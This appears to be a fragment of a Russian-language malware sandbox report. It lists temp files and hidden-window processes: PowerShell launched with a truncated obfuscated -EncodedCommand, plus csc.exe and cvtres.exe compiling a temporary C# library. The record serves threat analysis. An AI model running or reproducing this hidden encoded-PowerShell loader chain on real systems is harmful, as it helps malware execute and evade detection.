Техническая информация
- %TEMP%\content\1884-5052-wscript.exe-19-50-17-380.dump
- %TEMP%\jx3bzwg2\jx3bzwg2.0.cs
- %TEMP%\jx3bzwg2\jx3bzwg2.cmdline
- %TEMP%\jx3bzwg2\jx3bzwg2.out
- %TEMP%\jx3bzwg2\csce80c03cb9a4045fb817f99e9a9792c68.tmp
- %TEMP%\resada5.tmp
- %TEMP%\jx3bzwg2\jx3bzwg2.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBEAHIAdQBkAGMAIABUAGUAbABlACAAVgBvAGwAZABlAGwAIABJAG4AZABpAHMAIABMAGEAbgBkAGUAdgBlAGoAIABGAGkAdAB6AHAAYQB0AHIAIABMAGUAZABkAGUAbABzAGUAcgAgAFIAZQBwAGEAeQBzAG0AYQAgAEEAbgB0AGkA...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\jx3bzwg2\jx3bzwg2.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESADA5.tmp" "%TEMP%\jx3bzwg2\CSCE80C03CB9A4045FB817F99E9A9792C68.TMP"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBEAHIAdQBkAGMAIABUAGUAbABlACAAVgBvAGwAZABlAGwAIABJAG4AZABpAHMAIABMAGEAbgBkAGUAdgBlAGoAIABGAGkAdAB6AHAAYQB0AHIAIABMAGUAZABkAGUAbABzAGUAcgAgAFIAZQBwAGEAeQBzAG0AYQAgAEEAbgB0AGkA...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\jx3bzwg2\jx3bzwg2.cmdline"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESADA5.tmp" "%TEMP%\jx3bzwg2\CSCE80C03CB9A4045FB817F99E9A9792C68.TMP"